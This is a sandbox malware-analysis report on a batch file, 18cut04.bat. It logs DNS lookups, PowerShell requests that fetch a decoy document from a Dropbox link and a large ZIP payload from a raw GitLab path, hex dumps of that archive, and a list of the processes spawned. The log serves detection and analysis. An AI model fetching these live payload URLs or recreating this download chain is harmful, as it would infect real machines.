                                                                                                                                                                                                              Nov 18, 2024 08:35:18.170515060 CET192.168.2.71.1.1.10xec9eStandard query (0)www.dropbox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 18, 2024 08:35:19.982099056 CET192.168.2.71.1.1.10xe487Standard query (0)ucec8a788f965b69a40d3f9f21b4.dl.dropboxusercontent.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 18, 2024 08:35:25.555139065 CET192.168.2.71.1.1.10x190fStandard query (0)gitlab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 18, 2024 08:37:20.718367100 CET192.168.2.71.1.1.10xe556Standard query (0)ipinfo.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                              Nov 18, 2024 08:35:18.182621002 CET1.1.1.1192.168.2.70xec9eNo error (0)www.dropbox.comwww-env.dropbox-dns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                              Nov 18, 2024 08:35:18.182621002 CET1.1.1.1192.168.2.70xec9eNo error (0)www-env.dropbox-dns.com162.125.66.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 18, 2024 08:35:20.002048969 CET1.1.1.1192.168.2.70xe487No error (0)ucec8a788f965b69a40d3f9f21b4.dl.dropboxusercontent.comedge-block-www-env.dropbox-dns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                              Nov 18, 2024 08:35:20.002048969 CET1.1.1.1192.168.2.70xe487No error (0)edge-block-www-env.dropbox-dns.com162.125.66.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 18, 2024 08:35:25.562115908 CET1.1.1.1192.168.2.70x190fNo error (0)gitlab.com172.65.251.78A (IP address)IN (0x0001)false
                                                                                                                                                                                                              Nov 18, 2024 08:37:20.725759029 CET1.1.1.1192.168.2.70xe556No error (0)ipinfo.io34.117.59.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              0192.168.2.749704162.125.66.184437988C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              2024-11-18 07:35:19 UTC189OUTGET /scl/fi/2xk4dviogo9yr2ose1z39/17_Advertising_Campaign_and_Collaboration.docx?rlkey=4wos6vvfhgosyi024mdevofd9&st=9zhl6gij&dl=1 HTTP/1.1
                                                                                                                                                                                                              Host: www.dropbox.com
                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                              2024-11-18 07:35:19 UTC4091INHTTP/1.1 302 Found
                                                                                                                                                                                                              Content-Security-Policy: connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; font-src https://* data: ; frame-ancestors 'self' https://*.dropbox.com ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; media-src https://* blob: ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ https://accounts.google.com/gsi/client https://canny.io/sdk.js https://w [TRUNCATED]
                                                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                              Location: https://ucec8a788f965b69a40d3f9f21b4.dl.dropboxusercontent.com/cd/0/get/Cent9kswzwEN9hr7y-nSe5_7Gb6sPlLORL4clYfTalUkbSnpNuH6g0b2lWpn62eApcYjC-nmlcx0jPxwGPL15COpfW1dUOHZ6Oywhyedmu5zs2951Fv2Vh_UNi-qeZ9Vqbz-o3UObav-iF87IOG9rk4N/file?dl=1#
                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                              Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                              Set-Cookie: gvc=MzIwMTU5NzQyMjUzNDY2OTEwOTI0MDgyMDgyNTUxNjc0OTEzMjMx; Path=/; Expires=Sat, 17 Nov 2029 07:35:19 GMT; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                              Set-Cookie: t=Y8rx2sEi8YDu7RqGiFvgYoWp; Path=/; Domain=dropbox.com; Expires=Tue, 18 Nov 2025 07:35:19 GMT; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                              Set-Cookie: __Host-js_csrf=Y8rx2sEi8YDu7RqGiFvgYoWp; Path=/; Expires=Tue, 18 Nov 2025 07:35:19 GMT; Secure; SameSite=None
                                                                                                                                                                                                              Set-Cookie: __Host-ss=m1wnvt_jdU; Path=/; Expires=Tue, 18 Nov 2025 07:35:19 GMT; HttpOnly; Secure; SameSite=Strict
                                                                                                                                                                                                              Set-Cookie: locale=en; Path=/; Domain=dropbox.com; Expires=Sat, 17 Nov 2029 07:35:19 GMT
                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                              X-Permitted-Cross-Domain-Policies: none
                                                                                                                                                                                                              X-Robots-Tag: noindex, nofollow, noimageindex
                                                                                                                                                                                                              X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                              Content-Length: 17
                                                                                                                                                                                                              Date: Mon, 18 Nov 2024 07:35:19 GMT
                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                              Server: envoy
                                                                                                                                                                                                              Cache-Control: no-cache, no-store
                                                                                                                                                                                                              X-Dropbox-Response-Origin: far_remote
                                                                                                                                                                                                              X-Dropbox-Request-Id: 02fff559fe614b41bd64ecbe613288d0
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              2024-11-18 07:35:19 UTC17INData Raw: 3c 21 2d 2d 73 74 61 74 75 73 3d 33 30 32 2d 2d 3e
                                                                                                                                                                                                              Data Ascii: ...status=302-->


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              1192.168.2.749744172.65.251.784432064C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              2024-11-18 07:35:26 UTC100OUTGET /bose1511/mkt1511/-/raw/main/18Fukrun.zip HTTP/1.1
                                                                                                                                                                                                              Host: gitlab.com
                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                              2024-11-18 07:35:26 UTC284INHTTP/1.1 200 OK
                                                                                                                                                                                                              Date: Mon, 18 Nov 2024 07:35:26 GMT
                                                                                                                                                                                                              Content-Type: application/octet-stream
                                                                                                                                                                                                              Content-Length: 68971076
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              cache-control: max-age=60, public, must-revalidate, stale-while-revalidate=60, stale-if-error=300, s-maxage=60
                                                                                                                                                                                                              content-disposition: attachment
                                                                                                                                                                                                              2024-11-18 07:35:26 UTC2226INData Raw: 63 6f 6e 74 65 6e 74 2d 73 65 63 75 72 69 74 79 2d 70 6f 6c 69 63 79 3a 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 72 65 63 61 70 74 63 68 61 2f 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 72 65 63 61 70 74 63 68 61 2e 6e 65 74 2f 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 2f 6e 73 2e 68 74 6d 6c 20 68 74 74 70 73 3a 2f 2f 2a 2e 7a 75 6f 72 61 2e 63 6f 6d 2f 61 70 70 73 2f 50 75 62 6c 69 63 48 6f 73 74 65 64 50 61 67 65 4c 69 74 65 2e 64 6f 20 68 74 74 70 73 3a 2f 2f 67 69 74 6c 61 62 2e 63 6f 6d 2f 61 64 6d 69 6e 2f 20 68 74 74 70 73 3a 2f 2f 67 69 74 6c 61 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2f
                                                                                                                                                                                                              Data Ascii: content-security-policy: base-uri 'self'; child-src https://www.google.com/recaptcha/ https://www.recaptcha.net/ https://www.googletagmanager.com/ns.html https://*.zuora.com/apps/PublicHostedPageLite.do https://gitlab.com/admin/ https://gitlab.com/assets/
                                                                                                                                                                                                              2024-11-18 07:35:26 UTC575INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 74 39 43 70 37 79 6e 50 58 61 50 71 4d 58 30 6d 45 41 67 77 73 50 57 58 35 37 44 77 48 4d 32 61 72 32 30 73 41 42 38 67 39 42 45 61 47 69 77 35 33 58 69 46 4f 6a 71 4a 45 76 37 33 63 77 78 75 75 49 71 25 32 42 65 51 63 36 4d 69 35 51 78 47 66 75 59 6b 48 39 32 56 62 4c 37 71 45 76 49 25 32 46 35 6e 79 4a 25 32 42 56 32 34 74 66 66 76 46 6b 76 33 78 70 56 76 4b 6d 73 52 55 41 4b 50 49 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 4e 45 4c 3a 20
                                                                                                                                                                                                              Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=t9Cp7ynPXaPqMX0mEAgwsPWX57DwHM2ar20sAB8g9BEaGiw53XiFOjqJEv73cwxuuIq%2BeQc6Mi5QxGfuYkH92VbL7qEvI%2F5nyJ%2BV24tffvFkv3xpVvKmsRUAKPI%3D"}],"group":"cf-nel","max_age":604800}NEL:
                                                                                                                                                                                                              2024-11-18 07:35:26 UTC1369INData Raw: 50 4b 03 04 14 00 00 00 08 00 5c b1 46 58 b9 e1 db da 47 27 00 00 0a 90 00 00 0b 00 00 00 4c 49 43 45 4e 53 45 2e 74 78 74 dc 5c 5d 73 db b8 92 7d 47 15 ff 03 4a 2f b1 eb d2 8c e5 4c 32 93 49 6d ed ca 12 6d f3 ae 2d 79 29 29 99 dc a7 4b 49 90 85 09 45 68 08 d2 1a cd af df ee 06 c0 0f 59 76 ec cc 57 ed 2a 55 8a 44 11 8d 46 a3 d1 7d 4e 03 74 2f e0 57 d1 78 32 8a 3f f3 d1 05 9f 5c 85 7c 3c ba 98 7c ea c5 a1 c7 fe e3 d1 97 c7 3c 76 bb 2b 56 2a e3 db 44 f3 79 2e 92 42 2c b8 cc 78 b1 12 5c 24 79 ba e3 dd f7 ef 4f 35 9f ed f8 65 29 17 8a df 27 19 8f 95 d6 e5 9a 27 05 1f 17 72 be 2a 64 76 e7 b1 9b 04 da ac 93 42 ea f9 8a f7 45 56 e4 70 cb 51 ff 53 e4 73 2d 04 5f 15 c5 46 ff f8 fa f5 76 bb 0d e6 5b 19 64 e9 b1 eb 67 28 e0 3d 4f 93 6c a1 3d 06 6a 24 5c 97 f3 b9 d0
                                                                                                                                                                                                              Data Ascii: PK\FXG'LICENSE.txt\]s}GJ/L2Imm-y))KIEhYvW*UDF}Nt/Wx2?\|<|<v+V*Dy.B,x\$yO5e)''r*dvBEVpQSs-_Fv[dg(=Ol=j$\
                                                                                                                                                                                                              2024-11-18 07:35:26 UTC1369INData Raw: 87 7c 4a 97 6e 3f 4f ae 46 c3 a7 30 f1 b3 5e 0d e0 5c 39 0d 2e d2 85 9a 97 08 97 4c ea c6 ab 76 12 1b 2e e4 b1 27 00 c9 b5 9d f3 8f 76 41 9c d1 80 61 0e 73 5a 8b 64 7d db fc 4d f0 43 f0 ce e7 e2 d7 64 bd 49 71 dd 81 09 e5 06 3f a0 26 c6 a3 e7 0a a6 41 66 26 9d 3e 54 6e 81 e0 e3 a1 86 14 4b 1e 68 e2 31 87 11 ff 25 72 75 d2 27 0f e4 e7 e3 81 93 60 54 55 6b 51 db 04 7d c7 40 19 a2 15 85 72 ca 4b 6d bb 83 00 b0 14 39 22 4c b7 72 03 f4 a9 c6 42 36 56 d4 28 81 86 4f 63 5a 82 53 a3 41 9c ce 49 d1 d2 c2 63 66 a2 2b 16 04 9e 31 1d 0e 7a e8 25 fc 3a ea 87 43 f0 88 8f 61 3c c6 ef 30 b2 93 17 bc 50 7a 17 fc 0f 49 80 13 d5 bb 8c c3 f0 26 1c 4e 70 60 33 51 6c 11 ee 3c 8d 3d 21 60 74 c0 ce 9d 63 bf c2 de 51 b6 90 f7 92 26 05 a8 cf a8 01 2d f9 51 c7 ce 87 e8 1c f3 84 d8
                                                                                                                                                                                                              Data Ascii: |Jn?OF0^\9.Lv.'vAasZd}MCdIq?&Af&>TnKh1%ru'`TUkQ}@rKm9"LrB6V(OcZSAIcf+1z%:Ca<0PzI&Np`3Ql<=!`tcQ&-Q
                                                                                                                                                                                                              2024-11-18 07:35:26 UTC1369INData Raw: ac 84 09 1a 83 8f 24 1c 30 79 9e f8 bc df e3 ef df 9e be ed 56 c8 d2 63 df 04 2d f7 a7 d0 63 6d 68 f9 14 9e e4 6d 38 e9 b1 36 fb 38 ea e0 34 3b a0 d0 39 fe 16 80 d9 2a 36 1f f0 0a df dd 61 13 e8 41 c4 79 52 43 4e 8f bd 0c 73 f2 c3 90 d3 63 2f c7 9c 7c 0f 72 b6 41 3d b1 e1 1a 55 fd 2e e4 f9 a0 4a ef ec 61 ea 1d 35 12 23 b7 71 7d fa cf e8 94 3f 05 c8 6c 97 35 cc 68 8f e8 25 60 c3 ae c4 bf 04 6f ec f7 f5 37 42 8e e6 9e de 0b 81 c7 77 81 1b c8 b7 61 0f f8 e6 b1 06 93 fe 1d 08 04 96 e7 98 37 11 08 61 0b bf 06 22 78 63 13 8a b4 c6 ed 5b 05 3d f6 07 80 8f b7 7f 2d f8 78 1c eb 54 88 e3 4e c1 52 ca cc 02 a2 10 9a 81 34 58 55 76 4f 16 ee 42 fc 81 9b 4b 85 76 99 12 8b 81 76 2b 68 5c a0 7e f0 a5 9f a4 12 22 51 26 13 2c 0f 21 57 c0 15 07 fa 2c 21 0e 15 c4 0a b0 19 85
                                                                                                                                                                                                              Data Ascii: $0yVc-cmhm8684;9*6aAyRCNsc/|rA=U.Ja5#q}?l5h%`o7Bwa7a"xc[=-xTNR4XUvOBKvv+h\~"Q&,!W,!
                                                                                                                                                                                                              2024-11-18 07:35:26 UTC1369INData Raw: ae e0 7a 9c e6 88 18 e0 b3 2b aa ed de f4 00 39 c0 5b 34 ee 5f 71 70 eb 49 3c bd e1 0d 40 78 7d dd 80 9e 00 d3 26 57 80 76 2e 7b 80 ca 26 23 f0 ae ab 68 dc 28 0d 03 86 ba 9e 0e 50 2c b6 b3 d0 b4 d9 fe 00 80 24 04 6a 21 24 4a 40 54 8a 78 67 62 d1 dd 57 54 ad 80 5f 0d 3f 2b f4 16 0d 07 51 1c f6 27 4f c2 38 6c 61 bf 7a ec 13 60 d4 f1 08 ba 8f 2d a6 c3 7e 2f e2 d1 8d 41 7b 54 2c 87 71 0e 7a 93 1e b6 bd 8d 47 a0 39 a8 fd e9 2a 44 00 86 ea f7 00 59 f6 fa 06 3a 5f 60 b7 93 18 be fa 7c 18 5e 5e 47 97 e1 b0 1f 56 58 10 4c 08 40 79 34 05 33 f7 0d 38 ef c5 91 39 36 39 9d 00 20 bc e0 23 12 09 42 86 21 dd 61 26 a0 02 d1 a0 41 18 c3 b0 6f 7a 24 f6 82 b7 e6 83 66 fa 5f 61 3c 3a 81 c9 c4 fb f1 a0 a0 8b 5d 17 64 93 41 88 f2 51 9e 8d 5e 83 51 7f 7a e3 b0 ff b7 44 ae 43 af
                                                                                                                                                                                                              Data Ascii: z+9[4_qpI<@x}&Wv.{&#h(P,$j!$J@TxgbWT_?+Q'O8laz`-~/A{T,qzG9*DY:_`|^^GVXL@y438969 #B!a&Aoz$f_a<:]dAQ^QzDC
                                                                                                                                                                                                              2024-11-18 07:35:26 UTC1369INData Raw: 21 f2 21 9f 44 db 66 ec ab b4 df f1 1e c3 67 0e ec 1a 31 54 de 91 31 da e3 7a 19 41 62 8e 0c d5 b4 e8 e0 2e 4f f8 53 08 3a f7 e2 cf 0f 69 13 73 3c e9 e8 2b 23 07 03 f7 a7 b1 a9 06 c2 70 c7 d3 f3 f1 24 9a 4c 27 21 bb 1c 8d 06 44 bb c6 61 fc 11 d8 f7 f8 c3 c3 62 82 df a0 56 1f f0 f3 39 6e 11 e1 3c 44 c3 49 18 c7 d3 5b e4 42 c7 fc 6a f4 89 a8 5a 1f f9 fc 80 8c 38 1a da 9d b2 d0 fe e5 91 eb c8 da d8 67 0d 8e 56 d3 32 dc 95 ea 4f 1a b7 f1 91 a1 65 8d 31 b2 16 77 ab 77 ae 8e 2b ba 16 99 6e 69 c7 d1 30 b7 d6 41 c9 68 cc 9c fb 3d 6b fb 8a 4c d6 bf b2 b4 14 3c d8 66 05 93 13 7c fe b3 a6 0f ff 95 cc d7 f8 b7 12 18 e5 9b d7 2e f1 54 e7 5f bb c1 69 f0 03 ae c4 ee 1b cc 2b 3b 3a de f3 87 e6 46 ca ee cb a5 e4 27 fc 41 81 16 13 da d9 19 e7 bd 0c 53 fc 8e 5f 02 b4 cd 7c
                                                                                                                                                                                                              Data Ascii: !!Dfg1T1zAb.OS:is<+#p$L'!DabV9n<DI[BjZ8gV2Oe1ww+ni0Ah=kL<f|.T_i+;:F'AS_|
                                                                                                                                                                                                              2024-11-18 07:35:26 UTC1369INData Raw: 48 1a c8 06 67 e2 cd 7e 57 ee 30 e3 84 c2 5b 14 04 e2 81 20 cb 4c 16 1f 63 ae eb 9c 30 49 7a 0e 22 c9 0e d8 62 e4 b1 5d fd 57 a6 f9 e4 e8 ca c7 42 31 67 d8 0e a9 62 e4 03 a8 e9 11 61 05 a8 45 4b 83 fb 99 53 94 2a d8 ae 26 09 e1 6b 75 b3 77 02 99 39 21 90 f0 c0 34 67 a9 1a dd 7b 0a 1c d2 54 dc b1 27 b6 c6 6b 12 6b 3a 30 64 1d 18 5c ec c6 8c 0f 5d 6d bc 0f ef bc 4a ac 41 d3 d5 3c 3e 6c fd 85 f3 02 5d 23 26 0e 69 8d 8d f3 30 8b 20 9d ea ac a6 42 8c 6c 02 55 d7 fe 2d 07 40 d2 a6 ae 00 ff e2 97 62 91 97 59 6a a2 64 60 a2 6c 2b 5e 02 00 bf 75 91 e4 5d 10 16 c8 aa 6b c3 c1 91 32 a3 bb ae 29 a1 15 8f 52 57 86 2b af 25 0b 04 b4 41 a0 b7 cd a2 58 31 9b 3a 9a a4 b1 aa 1d e1 8f 70 b9 10 a2 8e 1f a1 5d 00 f7 22 d9 34 6a 94 59 c9 67 56 ad 44 9b c1 88 1c 64 07 61 e5 6d
                                                                                                                                                                                                              Data Ascii: Hg~W0[ Lc0Iz"b]WB1gbaEKS*&kuw9!4g{T'kk:0d\]mJA<>l]#&i0 BlU-@bYjd`l+^u]k2)RW+%AX1:p]"4jYgVDdam
                                                                                                                                                                                                              2024-11-18 07:35:26 UTC1369INData Raw: 49 c7 c8 d0 20 04 4b 20 8e 8e 05 c3 79 7f 28 4c 28 2d 76 38 66 3f 2a 24 59 7a 13 dd fe 2a af 8e 2d 32 64 d4 ec 1c a2 51 37 71 59 35 11 18 2b 0e 0e f8 56 ac 5b a5 fe 07 cc 5c bb 05 68 83 5b a1 49 47 67 c2 ae 0c 0f 45 06 08 85 5e bb d0 59 4f a1 d8 08 ed 83 7d 8e ce 9c bb 75 4b ab fa 81 a1 20 14 2a 4d 06 46 06 2e 8b a6 1c a0 1e 5d 31 d5 bd 62 f1 7b 4b 5a 91 6f 78 5b c6 47 04 b6 b1 7b 20 90 46 f5 a9 29 ff 58 37 8a 2d 64 b8 f6 3a 5a 49 dd 32 c1 cd 15 44 21 6e 0e 7f e1 b7 75 45 ad a0 60 69 bd 65 50 63 6b 08 c6 9b 7a cb 64 e9 27 c9 0b 22 c4 28 0a 3c 88 fd ca d9 e2 a7 e5 9e 18 b9 1b 44 5c 3f cc d3 23 05 79 c2 73 1f f3 06 84 b3 d3 13 a1 dc 2e 76 82 d9 06 66 b1 f4 5a 15 03 2e 27 ba 3d 21 b2 96 a9 0c 44 1b b4 81 db 03 ac 84 c8 97 7a 98 75 31 ed e3 10 18 8d 56 79 16
                                                                                                                                                                                                              Data Ascii: I K y(L(-v8f?*$Yz*-2dQ7qY5+V[\h[IGgE^YO}uK *MF.]1b{KZox[G{ F)X7-d:ZI2D!nuE`iePckzd'"(<D\?#ys.vfZ.'=!Dzu1Vy
                                                                                                                                                                                                              2024-11-18 07:35:26 UTC1369INData Raw: d9 02 f6 b3 f3 a2 c4 db 01 45 ff e6 fc b7 e3 f7 67 f0 08 6c 8c 97 52 09 88 3a 6b 09 87 1a 8f 53 74 46 23 24 05 9a 98 d8 74 8d 2a 63 35 89 97 be d1 9f d9 f2 c6 f0 03 5e d3 d3 f7 5c 56 e2 56 dc 1e 75 0a 8a 39 d6 e4 e4 6d 97 43 9c a4 c5 78 f3 4b af a5 01 dd 21 f0 dc e2 5d 09 b7 da 96 7b 79 a5 07 af 0f df b7 f8 bd 2e fe ca da f7 cf e7 cf 9f ff 30 7f f6 23 26 7a 0e 9e cf b4 0a 72 92 f4 27 ef f6 cf dd 9b 7c 70 81 09 00 f9 08 ac 8b d6 31 4c 47 df d2 50 93 bf 88 da 96 92 57 80 7e 79 15 0c e0 57 62 48 eb 17 1c 50 00 48 e7 eb 24 d9 13 0f cd 77 92 3c a7 19 3f f9 e1 e9 b3 ef 30 b3 76 f0 62 86 2c 83 64 e6 69 7a 4f e3 3a 64 84 35 30 df 8d f0 04 ae bc e1 4f ef f5 56 c0 e9 dc c0 40 4c b9 c1 85 3a 02 e7 88 4b 4f b1 11 37 da c0 72 db 4f 12 52 d9 5c 3e 69 22 92 f6 8b 75 ff
                                                                                                                                                                                                              Data Ascii: EglR:kStF#$t*c5^\VVu9mCxK!]{y.0#&zr'|p1LGPW~yWbHPH$w<?0vb,dizO:d50OV@L:KO7rOR\>i"u


                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                              Click to dive into process behavior distribution

                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                              Target ID:0
                                                                                                                                                                                                              Start time:02:35:11
                                                                                                                                                                                                              Start date:18/11/2024
                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\18cut04.bat" "
                                                                                                                                                                                                              Imagebase:0x7ff677e60000
                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                              Target ID:1
                                                                                                                                                                                                              Start time:02:35:11
                                                                                                                                                                                                              Start date:18/11/2024
                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                              Imagebase:0x7ff75da10000
                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                              Target ID:3
                                                                                                                                                                                                              Start time:02:35:12
                                                                                                                                                                                                              Start date:18/11/2024
                                                                                                                                                                                                              Path:C:\Windows\System32\chcp.com
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:chcp.com 437
                                                                                                                                                                                                              Imagebase:0x7ff617aa0000
                                                                                                                                                                                                              File size:14'848 bytes
                                                                                                                                                                                                              MD5 hash:33395C4732A49065EA72590B14B64F32
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:4
                                                                                                                                                                                                              Start time:02:35:12
                                                                                                                                                                                                              Start date:18/11/2024
                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c type tmp
                                                                                                                                                                                                              Imagebase:0x7ff677e60000
                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:5
                                                                                                                                                                                                              Start time:02:35:12
                                                                                                                                                                                                              Start date:18/11/2024
                                                                                                                                                                                                              Path:C:\Windows\System32\find.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:find
                                                                                                                                                                                                              Imagebase:0x7ff705200000
                                                                                                                                                                                                              File size:17'920 bytes
                                                                                                                                                                                                              MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:6
                                                                                                                                                                                                              Start time:02:35:12
                                                                                                                                                                                                              Start date:18/11/2024
                                                                                                                                                                                                              Path:C:\Windows\System32\findstr.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:fiNdstr /L /I set "C:\Users\user\Desktop\18cut04.bat"
                                                                                                                                                                                                              Imagebase:0x7ff719910000
                                                                                                                                                                                                              File size:36'352 bytes
                                                                                                                                                                                                              MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:7
                                                                                                                                                                                                              Start time:02:35:12
                                                                                                                                                                                                              Start date:18/11/2024
                                                                                                                                                                                                              Path:C:\Windows\System32\findstr.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:fiNdstr /L /I goto "C:\Users\user\Desktop\18cut04.bat"
                                                                                                                                                                                                              Imagebase:0x7ff719910000
                                                                                                                                                                                                              File size:36'352 bytes
                                                                                                                                                                                                              MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:8
                                                                                                                                                                                                              Start time:02:35:12
                                                                                                                                                                                                              Start date:18/11/2024
                                                                                                                                                                                                              Path:C:\Windows\System32\findstr.exe
                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                              Commandline:fiNdstr /L /I echo "C:\Users\user\Desktop\18cut04.bat"
                                                                                                                                                                                                              Imagebase:0xca0000
                                                                                                                                                                                                              File size:36'352 bytes
                                                                                                                                                                                                              MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Reputation:moderate
                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                              Target ID:10
                                                                                                                                                                                                              Start time:02:35:12
                                                                                                                                                                                                              Start date:18/11/2024
                                                                                                                                                                                                              Path:C:\Windows\System32\findstr.exe
                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                              Commandline:fiNdstr /L /I pause "C:\Users\user\Desktop\18cut04.bat"
                                                                                                                                                                                                              Imagebase:0x7ff719910000
                                                                                                                                                                                                              File size:36'352 bytes
                                                                                                                                                                                                              MD5 hash:804A6AE28E88689E0CF1946A6CB3FEE5
                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                              Reputation:moderate
